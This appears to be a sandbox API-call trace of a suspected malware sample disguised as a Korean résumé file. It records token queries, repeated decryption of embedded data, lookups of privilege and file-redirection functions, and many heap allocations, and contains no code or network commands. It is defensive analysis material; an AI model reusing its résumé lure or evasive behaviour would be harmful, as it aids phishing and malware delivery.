# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 09.06.2020 14:47:05.504 Process: id = "1" image_name = "이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe" page_root = "0x40462000" os_pid = "0xa30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xab4 [0048.438] GetVersion () returned 0x1db10106 [0048.438] GetCurrentProcess () returned 0xffffffff [0048.439] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x18ff7c | out: TokenHandle=0x18ff7c*=0x70) returned 1 [0048.446] GetTokenInformation (in: TokenHandle=0x70, TokenInformationClass=0x14, TokenInformation=0x18ff80, TokenInformationLength=0x4, ReturnLength=0x18ff84 | out: TokenInformation=0x18ff80, ReturnLength=0x18ff84) returned 1 [0048.446] CloseHandle (hObject=0x70) returned 1 [0048.446] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\" " [0048.446] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe\" ", pNumArgs=0x18ff84 | out: pNumArgs=0x18ff84) returned 0x5646e8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe" [0048.446] GetProcessHeap () returned 0x550000 [0048.446] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1) returned 0x5647a0 [0048.446] GetProcessHeap () returned 0x550000 [0048.446] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x5647b0 [0048.446] CryptAcquireContextW (in: phProv=0x5647b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x5647b0*=0x564928) returned 1 [0049.248] GetProcessHeap () returned 0x550000 [0049.248] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa0) returned 0x5651b8 [0049.248] CryptImportKey (in: hProv=0x564928, pbData=0x18fef8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x564860) returned 1 [0049.251] CryptDecrypt (in: hKey=0x564860, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5651b8, pdwDataLen=0x5647d8 | out: pbData=0x5651b8, pdwDataLen=0x5647d8) returned 1 [0049.254] CryptDestroyKey (hKey=0x564860) returned 1 [0049.254] GetSystemWindowsDirectoryW (in: lpBuffer=0x419020, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0049.254] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x419228, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\이력서(20200609)_경력사항 기재하였으니 확인부탁드립니다 감사합니다.exe")) returned 0x52 [0049.254] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x41a228, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0052.098] GetProcessHeap () returned 0x550000 [0052.098] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x564890 [0052.098] GetProcessHeap () returned 0x550000 [0052.098] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5659f8 [0052.098] GetProcessHeap () returned 0x550000 [0052.098] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x55f0d0 [0052.098] GetProcessHeap () returned 0x550000 [0052.098] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5642d0 [0052.098] CryptImportKey (in: hProv=0x564928, pbData=0x18ff00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x565bf0) returned 1 [0052.099] CryptDecrypt (in: hKey=0x565bf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5642d0, pdwDataLen=0x18ff68 | out: pbData=0x5642d0, pdwDataLen=0x18ff68) returned 1 [0052.099] CryptDestroyKey (hKey=0x565bf0) returned 1 [0052.099] GetProcessHeap () returned 0x550000 [0052.099] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x5642f8 [0052.099] CryptImportKey (in: hProv=0x564928, pbData=0x18ff00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x565bf0) returned 1 [0052.099] CryptDecrypt (in: hKey=0x565bf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5642f8, pdwDataLen=0x18ff68 | out: pbData=0x5642f8, pdwDataLen=0x18ff68) returned 1 [0052.099] CryptDestroyKey (hKey=0x565bf0) returned 1 [0052.099] GetProcessHeap () returned 0x550000 [0052.099] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x565bf0 [0052.099] CryptImportKey (in: hProv=0x564928, pbData=0x18ff00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x565c38) returned 1 [0052.099] CryptDecrypt (in: hKey=0x565c38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x565bf0, pdwDataLen=0x18ff68 | out: pbData=0x565bf0, pdwDataLen=0x18ff68) returned 1 [0052.099] CryptDestroyKey (hKey=0x565c38) returned 1 [0052.099] GetProcessHeap () returned 0x550000 [0052.099] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x80) returned 0x565c38 [0052.099] CryptImportKey (in: hProv=0x564928, pbData=0x18ff00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x565cc0) returned 1 [0052.099] CryptDecrypt (in: hKey=0x565cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x565c38, pdwDataLen=0x18ff6c | out: pbData=0x565c38, pdwDataLen=0x18ff6c) returned 1 [0052.099] CryptDestroyKey (hKey=0x565cc0) returned 1 [0052.099] GetProcessHeap () returned 0x550000 [0052.099] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x565a08 [0052.099] GetProcessHeap () returned 0x550000 [0052.099] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xd) returned 0x565cd8 [0052.099] GetProcessHeap () returned 0x550000 [0052.100] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1f) returned 0x564320 [0052.100] GetProcessHeap () returned 0x550000 [0052.100] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1e) returned 0x564348 [0052.100] GetProcessHeap () returned 0x550000 [0052.100] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xd) returned 0x565cf0 [0052.100] GetProcessHeap () returned 0x550000 [0052.100] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x18) returned 0x5660c0 [0052.100] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0052.100] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76d5d650 [0052.100] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0052.100] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76d5d668 [0052.101] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77710000 [0052.101] GetProcAddress (hModule=0x77710000, lpProcName="CreateProcessWithTokenW") returned 0x7775531f [0052.101] GetProcessHeap () returned 0x550000 [0052.101] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565c38 | out: hHeap=0x550000) returned 1 [0052.101] GetProcessHeap () returned 0x550000 [0052.101] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565cd8 | out: hHeap=0x550000) returned 1 [0052.101] GetProcessHeap () returned 0x550000 [0052.101] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564320 | out: hHeap=0x550000) returned 1 [0052.101] GetProcessHeap () returned 0x550000 [0052.101] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564348 | out: hHeap=0x550000) returned 1 [0052.101] GetProcessHeap () returned 0x550000 [0052.101] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565cf0 | out: hHeap=0x550000) returned 1 [0052.101] GetProcessHeap () returned 0x550000 [0052.101] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5660c0 | out: hHeap=0x550000) returned 1 [0052.101] GetProcessHeap () returned 0x550000 [0052.101] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565a08 | out: hHeap=0x550000) returned 1 [0052.101] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x18ff58, cchData=32 | out: lpLCData="\x03") returned 16 [0052.102] GetProcessHeap () returned 0x550000 [0052.102] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x4) returned 0x565a08 [0052.102] GetProcessHeap () returned 0x550000 [0052.102] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa0) returned 0x5660c0 [0052.102] CryptImportKey (in: hProv=0x564928, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x565c38) returned 1 [0052.102] CryptDecrypt (in: hKey=0x565c38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5660c0, pdwDataLen=0x18ff48 | out: pbData=0x5660c0, pdwDataLen=0x18ff48) returned 1 [0052.102] CryptDestroyKey (hKey=0x565c38) returned 1 [0052.102] GetProcessHeap () returned 0x550000 [0052.102] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x565a18 [0052.102] GetProcessHeap () returned 0x550000 [0052.102] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x12) returned 0x565c38 [0052.102] GetProcessHeap () returned 0x550000 [0052.102] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x565a28 [0052.102] GetProcessHeap () returned 0x550000 [0052.102] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x564348 [0052.102] GetProcessHeap () returned 0x550000 [0052.102] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x565c58 [0052.102] GetProcessHeap () returned 0x550000 [0052.102] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xc) returned 0x565cd8 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x565c68 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x564320 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x565c78 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe) returned 0x565cf0 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x565c88 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x26) returned 0x566168 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x565c98 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x18) returned 0x566198 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5660c0 | out: hHeap=0x550000) returned 1 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x4) returned 0x565ca8 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x564370 [0052.103] CryptImportKey (in: hProv=0x564928, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5660c0) returned 1 [0052.103] CryptDecrypt (in: hKey=0x5660c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x564370, pdwDataLen=0x18ff48 | out: pbData=0x564370, pdwDataLen=0x18ff48) returned 1 [0052.103] CryptDestroyKey (hKey=0x5660c0) returned 1 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566470 [0052.103] GetProcessHeap () returned 0x550000 [0052.103] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe) returned 0x565d08 [0052.103] GetProcessHeap () returned 0x550000 [0052.104] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564370 | out: hHeap=0x550000) returned 1 [0052.104] GetProcessHeap () returned 0x550000 [0052.104] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x4) returned 0x566480 [0052.104] GetProcessHeap () returned 0x550000 [0052.104] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x564370 [0052.104] CryptImportKey (in: hProv=0x564928, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5660c0) returned 1 [0052.104] CryptDecrypt (in: hKey=0x5660c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x564370, pdwDataLen=0x18ff48 | out: pbData=0x564370, pdwDataLen=0x18ff48) returned 1 [0052.104] CryptDestroyKey (hKey=0x5660c0) returned 1 [0052.104] GetProcessHeap () returned 0x550000 [0052.104] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566490 [0052.104] GetProcessHeap () returned 0x550000 [0052.104] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x564398 [0052.104] GetProcessHeap () returned 0x550000 [0052.104] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564370 | out: hHeap=0x550000) returned 1 [0052.104] GetProcessHeap () returned 0x550000 [0052.104] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x4) returned 0x5664a0 [0052.104] GetProcessHeap () returned 0x550000 [0052.104] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a0) returned 0x5661b8 [0052.104] CryptImportKey (in: hProv=0x564928, pbData=0x18fee0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5660c0) returned 1 [0052.104] CryptDecrypt (in: hKey=0x5660c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5661b8, pdwDataLen=0x18ff48 | out: pbData=0x5661b8, pdwDataLen=0x18ff48) returned 1 [0052.104] CryptDestroyKey (hKey=0x5660c0) returned 1 [0052.104] GetProcessHeap () returned 0x550000 [0052.104] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5664b0 [0052.104] GetProcessHeap () returned 0x550000 [0052.104] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5664c0 [0052.104] GetProcessHeap () returned 0x550000 [0052.104] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5664d0 [0052.104] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5664e0 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5664f0 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566500 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566510 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566520 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566530 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xc) returned 0x565d20 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566540 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xc) returned 0x565d38 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566550 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xc) returned 0x565d50 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566560 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566570 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566580 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566590 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5665a0 [0052.105] GetProcessHeap () returned 0x550000 [0052.105] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5665b0 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5665c0 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6) returned 0x5665d0 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5665e0 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x16) returned 0x5660c0 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5665f0 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe) returned 0x565d68 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566600 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe) returned 0x565d80 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566610 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566620 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566630 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566640 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566650 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566660 [0052.106] GetProcessHeap () returned 0x550000 [0052.106] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566670 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566680 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566690 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5666a0 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5666b0 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5666c0 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5666d0 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5666e0 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5666f0 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566700 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566710 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566720 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566730 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa) returned 0x565d98 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566740 [0052.107] GetProcessHeap () returned 0x550000 [0052.107] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566750 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566760 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566770 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566780 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566790 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5667a0 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa) returned 0x565db0 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5667b0 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5667c0 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5667d0 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5667e0 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5667f0 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566800 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566810 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566820 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566830 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566840 [0052.108] GetProcessHeap () returned 0x550000 [0052.108] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566870 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566880 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566890 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5668a0 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5668b0 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa) returned 0x565dc8 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5668c0 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5668d0 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5668e0 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x12) returned 0x5660e0 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x5668f0 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x565de0 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566900 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe) returned 0x565df8 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566910 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566920 [0052.109] GetProcessHeap () returned 0x550000 [0052.109] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566930 [0052.109] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa) returned 0x565e10 [0052.110] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x566940 [0052.110] GetProcessHeap () returned 0x550000 [0052.110] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa) returned 0x565e28 [0052.110] GetProcessHeap () returned 0x550000 